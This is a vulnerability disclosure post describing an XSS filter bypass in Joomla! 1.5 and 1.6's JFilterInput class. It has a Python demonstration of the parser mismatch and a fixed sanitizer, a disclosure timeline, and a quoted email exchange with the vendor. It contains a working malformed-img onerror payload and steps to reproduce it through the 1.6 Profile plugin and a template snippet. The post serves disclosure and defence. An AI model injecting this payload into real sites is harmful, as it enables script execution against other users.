Joomla! 1.5 and 1.6 rely on the JFilterInput class to sanitize user-supplied HTML. The class scans a given string for HTML tags, checks each tag and its attributes against a whitelist of allowed elements and attributes, and strips out anything that is not allowed. However, malformed HTML can be used to get past the filter: the filter and the browser tokenize the same string differently, so an event-handler attribute the filter never sees as an attribute reaches the page and executes as script (XSS).
The following string bypasses JFilterInput's "safe" attributes in both 1.5 and 1.6:
<img src="<img src=x"/onerror=alert(1)//">
Users of 1.6 can test this by enabling the "Profile" user plugin and injecting this string into the "About Me" textarea. Joomla! 1.5 has no known core extensions that allow guests or regular users to post HTML, however any 3rd party extension that relies on this class to sanitize input will be vulnerable.
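To make the parser differential concrete, here is an added Python example. It is not code from this advisory or from Joomla!; JFilterInput itself is not reproduced. The "naive" filter is a hypothetical scan-and-strip sanitizer that makes the same class of mistake the advisory describes (treating `<img src="` as harmless text when a second `<` appears before the closing `>`, and re-emitting attribute values byte-for-byte), the whitelist and function names are assumptions chosen for the demo, and the two input strings are the ones quoted above. Python's html.parser stands in for the browser's tokenizer; the last function shows the fix a practitioner would want, filtering on the parsed token stream and re-serialising from escaped values rather than from the original bytes.

```python
"""Added example: why a scan-and-strip HTML filter and a browser disagree on
<img src="<img src=x"/onerror=alert(1)//">.  The toy filter below is NOT
JFilterInput; it only reproduces the class of mistake (hypothetical code)."""
import html
import re
from html.parser import HTMLParser

# Hypothetical whitelist chosen for the demo (not Joomla's default lists).
ALLOWED_TAGS = {"a", "b", "i", "p", "img"}
ALLOWED_ATTRS = {"href", "src", "alt", "title"}

# Constructed inputs: the two strings from the advisory above.
PLAIN = '<img src="x"/onerror=alert(1)//>'             # the toy filter strips this
NESTED = '<img src="<img src=x"/onerror=alert(1)//">'  # ...but passes this through

# name=value pairs; a bare value runs to the next whitespace, quotes included.
_ATTR_RE = re.compile(r"""(\w+)\s*=\s*("[^"]*"|'[^']*'|\S+)""")


def _naive_clean_tag(body):
    """Rebuild the text between '<' and '>' keeping only whitelisted pieces,
    but re-emitting attribute values exactly as they were found."""
    m = re.match(r"\s*(/?)([A-Za-z][\w-]*)", body)
    if not m or m.group(2).lower() not in ALLOWED_TAGS:
        return ""
    slash, name = m.groups()
    kept = [f"{a}={v}" for a, v in _ATTR_RE.findall(body[m.end():])
            if a.lower() in ALLOWED_ATTRS]
    return "<" + slash + name.lower() + "".join(" " + a for a in kept) + ">"


def naive_sanitize(markup):
    """Toy scan-and-strip filter.  The bug: when another '<' appears before the
    closing '>', it assumes the first '<' never opened a real tag, copies it to
    the output as plain text and restarts at the inner '<'."""
    out, i = [], 0
    while i < len(markup):
        lt = markup.find("<", i)
        if lt < 0:
            out.append(markup[i:])
            break
        out.append(markup[i:lt])
        gt = markup.find(">", lt + 1)
        if gt < 0:                      # unterminated tag: left as text
            out.append(markup[lt:])
            break
        inner = markup.find("<", lt + 1)
        if 0 <= inner < gt:             # the "nested tag" case from the advisory
            out.append(markup[lt:inner])
            i = inner
            continue
        out.append(_naive_clean_tag(markup[lt + 1:gt]))
        i = gt + 1
    return "".join(out)


class _TagCollector(HTMLParser):
    """Records start tags the way an HTML tokenizer sees them."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def browser_view(markup):
    """What a browser-like tokenizer (here html.parser) makes of `markup`."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


class _Rebuilder(HTMLParser):
    """Whitelist filter applied to the token stream: output is re-serialised
    from parsed tag names and escaped values, never from the original bytes."""
    def __init__(self):
        super().__init__()
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return
        parts = [tag] + [f'{n}="{html.escape(v, quote=True)}"'
                         for n, v in attrs if n in ALLOWED_ATTRS and v is not None]
        self.out.append("<" + " ".join(parts) + ">")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))


def tokenized_sanitize(markup):
    r = _Rebuilder()
    r.feed(markup)
    r.close()
    return "".join(r.out)


if __name__ == "__main__":
    for s in (PLAIN, NESTED):
        print("input    :", s)
        print("naive    :", naive_sanitize(s))
        print("browser  :", browser_view(naive_sanitize(s)))
        print("tokenized:", tokenized_sanitize(s))
```

Run it with `python3` and compare the two inputs: the naive filter strips `onerror` from the plain string but returns the nested string unchanged, and html.parser then reports an `img` tag whose `src` is `<img src=x` and whose `onerror` is `alert(1)//"` (the trailing `//` turns the stray quote into a JavaScript comment, which is why it is in the payload). The token-stream version keeps only `src`, with the `<` escaped, for both inputs. The general point is that a sanitizer must tokenize the way the consumer will, and must rebuild its output from the parsed tokens instead of passing input bytes through.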
- Vulnerabilities Discovered: 15 January 2011
- Vendor Notified: 15 January 2011
- Vendor Response: 17 January 2011
- Update Available: ...
- Disclosure: 1 February 2011
Since posting this, I've decided to go ahead and publish the email exchange... in all its brevity. Some headers removed.
-------- Original Message --------
Return-path: <firstname.lastname@example.org>
Envelope-to: email@example.com
Delivery-date: Mon, 17 Jan 2011 19:40:17 -0600
Date: Tue, 18 Jan 2011 01:40:26 +0000
Subject: Re: [#XNT-28157-847] JFilterInput XSS Bypass
From: Joomla! Security Strike Team (JSST) <firstname.lastname@example.org>
To: email@example.com

Thank you for your email regarding a new vulnerability. We will investigate this as quickly as we can to verify and confirm the details. Once this is completed we will evaluate the complexity and criticality to determine the necessary resources and timing to correct the issue.

Please note: We may contact you for additional details, and/or advise you of the outcome of our investigation. If this ticket XNT-28157-847 is not replied to within 7 days of Tue, 18 Jan 2011 01:40:20 +0000, it will be automatically closed.

On Sat, 15 Jan 2011 19:38:20 +0000, jeff <firstname.lastname@example.org> wrote:
> The following string bypasses JFilterInput's "safe" attributes in both
> 1.5 and 1.6:
>
> <img src="<img src=x"/onerror=alert(1)//">
>
> Here's a quick way to reproduce: append the following somewhere in the
> template:
>
> <?php
> $test = '<img src="x"/onerror=alert(1)//>'; // will be sanitized
> $test .= '<img src="<img src=x"/onerror=alert(2)//">'; // will not be sanitized
> $filter =& JFilterInput::getInstance(null, null, 1, 1);
> echo $filter->clean($test);
> ?>
>
> The impact of this could be pretty wide, as any extension using this
> method to sanitize user input is potentially vulnerable. One such
> example is in 1.6 plg_user_profile "About Me" field.
>
> TinyMCE will neuter this bypass if attempted in its html source editor
> or by disabling via the ui button, but this is not a good remedy.
It was well over 7 days, so I guess I'm a jackass for assuming the ticket was closed?